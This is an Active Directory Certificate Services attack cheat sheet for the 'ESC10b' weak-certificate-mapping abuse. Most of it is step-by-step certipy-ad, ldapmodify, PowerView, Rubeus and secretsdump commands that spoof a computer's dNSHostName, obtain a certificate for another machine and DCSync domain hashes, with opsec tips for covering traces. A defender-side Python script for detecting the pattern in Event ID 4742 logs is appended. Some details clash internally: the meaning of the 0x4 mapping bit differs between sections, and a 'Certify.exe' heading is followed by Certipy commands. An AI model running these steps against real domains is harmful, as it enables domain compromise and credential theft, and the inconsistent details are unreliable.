ADCSESC10b
ESC10b: Weak certificate mapping (CertificateMappingMethods includes UPN/SAN) + GenericWrite on a computer account → strip SPNs, change victim computer's dNSHostName to target computer's FQDN, enroll cert, restore, authenticate as target computer.
Applies to: Principals with GenericWrite on a computer account → any Machine Auth template → DC with CertificateMappingMethods including 0x4 (subject/issuer) or weak binding
Linux Abuse
certipy-ad
# Step 1: Confirm ESC10b condition
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout
# Step 2: Remove conflicting SPNs from victim computer
ldapsearch -x -D '<attacker-dn>' -w '<password>' -h <dc-ip> \
-b '<victim-computer-dn>' servicePrincipalName
echo -e "dn: <victim-computer-dn>\nchangetype: modify\ndelete: servicePrincipalName\nservicePrincipalName: HOST/<victim-computer>" \
| ldapmodify -x -D '<attacker-dn>' -w '<password>' -h <dc-ip>
# Also remove RestrictedKrbHost SPN if present:
echo -e "dn: <victim-computer-dn>\nchangetype: modify\ndelete: servicePrincipalName\nservicePrincipalName: RestrictedKrbHost/<victim-computer>" \
| ldapmodify -x -D '<attacker-dn>' -w '<password>' -h <dc-ip>
# Step 3: Change victim computer dNSHostName to target computer FQDN
certipy-ad account update -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-user '<victim-computer>$' -dns <target-computer>.<domain>
# Step 4: Set mail if required
echo -e "dn: <victim-computer-dn>\nchangetype: modify\nreplace: mail\nmail: dummy@mail.com" \
| ldapmodify -x -D '<attacker-dn>' -w '<password>' -h <dc-ip>
# Step 5: Get victim computer credentials
certipy-ad shadow auto -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-account '<victim-computer>$'
# Step 6: Enroll cert as victim computer (dNSHostName = target FQDN)
certipy-ad req -u '<victim-computer>$@<domain>' -hashes ':<victim-ntlm>' -dc-ip <dc-ip> \
-ca '<ca>' -target <ca-host> -template '<template>'
# Output: <target-computer>.pfx
# Step 7: Restore dNSHostName
certipy-ad account update -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-user '<victim-computer>$' -dns <victim-computer>.<domain>
# Step 8: Authenticate as target computer
certipy-ad auth -pfx <target-computer>.pfx -dc-ip <dc-ip> -ldap-shell
# Step 9: If target is DC β DCSync
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-computer>$@<dc-ip>'
Windows Abuse
PowerView + Certify.exe + Rubeus
# Step 1: Remove SPNs
Set-DomainObject -Identity '<victim-computer>$' -Clear serviceprincipalname
# Or set a non-conflicting one:
Set-DomainObject -Identity '<victim-computer>$' -Set @{'serviceprincipalname'='HOST/<victim-computer>'}
# Step 2: Change dNSHostName
Set-DomainObject -Identity '<victim-computer>$' -Set @{'dnshostname'='<target-computer>.<domain>'}
# Step 3: Set mail if required
Set-DomainObject -Identity '<victim-computer>$' -Set @{'mail'='dummy@mail.com'}
# Step 4: Enroll cert as victim computer
Certipy.exe req -u '<victim-computer>$@<domain>' -p '<victim-password>' -dc-ip <dc-ip> \
-ca '<ca>' -target <ca-host> -template '<template>'
# Step 5: Restore dNSHostName
Certipy.exe account update -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-user '<victim-computer>$' -dns <victim-computer>.<domain>
# Step 6: Authenticate
Certipy.exe auth -pfx <target-computer>.pfx -dc-ip <dc-ip> -ldap-shell
# Alternative TGT via Rubeus
Rubeus.exe asktgt /user:'<target-computer>$' /domain:<domain> /certificate:<pfx-base64> /ptt
Opsec
- SPN and dNSHostName changes are logged (Event ID 4742).
- Restore both attributes immediately after enrollment.
- CertificateMappingMethods registry key on DC:
HKLM\SYSTEM\CurrentControlSet\Services\Kdc → value must include 0x4 for this to work.
- CA retains issued cert; victim computer account is the logged requester.
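The Opsec bullets name the two places a defender can catch this chain: the Event ID 4742 records written when servicePrincipalName and dNSHostName are changed, and the CertificateMappingMethods value on the DC. The following Python is an added defender-side example, not part of this cheat sheet and not Certipy's code. It runs over a few constructed 4742 records (field names TargetUserName, SubjectUserName, DnsHostName and ServicePrincipalNames follow the 4742 schema; the records, the computer inventory and the use of an empty string for a cleared SPN value are constructed assumptions) and flags a dNSHostName being pointed at another computer's FQDN, a quick change-and-restore of that attribute, and SPN clearing by a third party. It also decodes a CertificateMappingMethods bitmask so an auditor can tell whether the 0x4 bit is set.

```python
"""ESC10b detection helper over constructed Event ID 4742 records.

Added example; the records, inventory and thresholds below are constructed
sample data, not output from any real domain.
"""
from datetime import datetime, timedelta

# Constructed inventory: sAMAccountName -> (expected dNSHostName, is a DC)
INVENTORY = {
    "DC01$": ("dc01.corp.example", True),
    "WS01$": ("ws01.corp.example", False),
    "SRV02$": ("srv02.corp.example", False),
}

# Constructed 4742 records. "-" means the attribute was not part of the
# change (the convention Windows uses in this event). An empty string is
# an assumed representation of a cleared servicePrincipalName.
EVENTS = [
    {"time": "2024-05-01T10:00:00", "SubjectUserName": "jdoe", "TargetUserName": "WS01$",
     "ServicePrincipalNames": "", "DnsHostName": "-"},
    {"time": "2024-05-01T10:00:05", "SubjectUserName": "jdoe", "TargetUserName": "WS01$",
     "ServicePrincipalNames": "-", "DnsHostName": "dc01.corp.example"},
    {"time": "2024-05-01T10:03:40", "SubjectUserName": "jdoe", "TargetUserName": "WS01$",
     "ServicePrincipalNames": "-", "DnsHostName": "ws01.corp.example"},
    {"time": "2024-05-01T11:30:00", "SubjectUserName": "SRV02$", "TargetUserName": "SRV02$",
     "ServicePrincipalNames": "HOST/srv02.corp.example", "DnsHostName": "-"},
]

# How quickly a changed dNSHostName must be restored to count as suspicious.
RESTORE_WINDOW = timedelta(minutes=30)


def fqdn_owner(fqdn):
    """Return the sAMAccountName whose inventory FQDN matches, or None."""
    for sam, (expected, _is_dc) in INVENTORY.items():
        if expected.lower() == fqdn.lower():
            return sam
    return None


def detect_esc10b(events):
    """Return a list of (severity, message) findings over 4742 records."""
    findings = []
    pending = {}  # TargetUserName -> time its dNSHostName left the expected value
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        target = ev["TargetUserName"]
        actor = ev["SubjectUserName"]
        expected = INVENTORY.get(target, ("", False))[0]

        # SPNs cleared by a principal other than the machine itself
        if ev["ServicePrincipalNames"] == "" and actor != target:
            findings.append(("medium", f"{actor} cleared servicePrincipalName on {target}"))

        new_dns = ev["DnsHostName"]
        if new_dns == "-":
            continue
        # dNSHostName now matches another computer's FQDN (DC targets rank higher)
        owner = fqdn_owner(new_dns)
        if owner and owner != target:
            sev = "high" if INVENTORY[owner][1] else "medium"
            findings.append((sev, f"{actor} set dNSHostName of {target} to {new_dns}, "
                                  f"which belongs to {owner}"))
        # Track change-and-restore within RESTORE_WINDOW
        if new_dns.lower() != expected.lower():
            pending[target] = ts
        elif target in pending and ts - pending.pop(target) <= RESTORE_WINDOW:
            findings.append(("high", f"dNSHostName of {target} restored to {expected} "
                                     f"shortly after being changed (change-and-restore pattern)"))
    return findings


# Schannel CertificateMappingMethods bits; 0x4 is the UPN/SAN mapping the
# cheat sheet above relies on.
MAPPING_BITS = [
    (0x01, "subject/issuer"),
    (0x02, "issuer"),
    (0x04, "UPN/SAN"),
    (0x08, "S4U2Self"),
    (0x10, "S4U2Self explicit"),
]


def decode_mapping_methods(value):
    """Return (weak, names): weak is True when the 0x4 UPN/SAN bit is set."""
    names = [name for bit, name in MAPPING_BITS if value & bit]
    return bool(value & 0x4), names


if __name__ == "__main__":
    for sev, msg in detect_esc10b(EVENTS):
        print(f"[{sev}] {msg}")
    for value in (0x4, 0x18):
        weak, names = decode_mapping_methods(value)
        print(f"CertificateMappingMethods={value:#x}: {names} weak={weak}")
```

The collision check is the strongest signal: outside of a legitimate rename, a computer account's dNSHostName should never equal another account's FQDN, and a match against a domain controller is worth paging on. The restore window is a tunable assumption; real feeds should key on the event's SubjectUserSid rather than the display name.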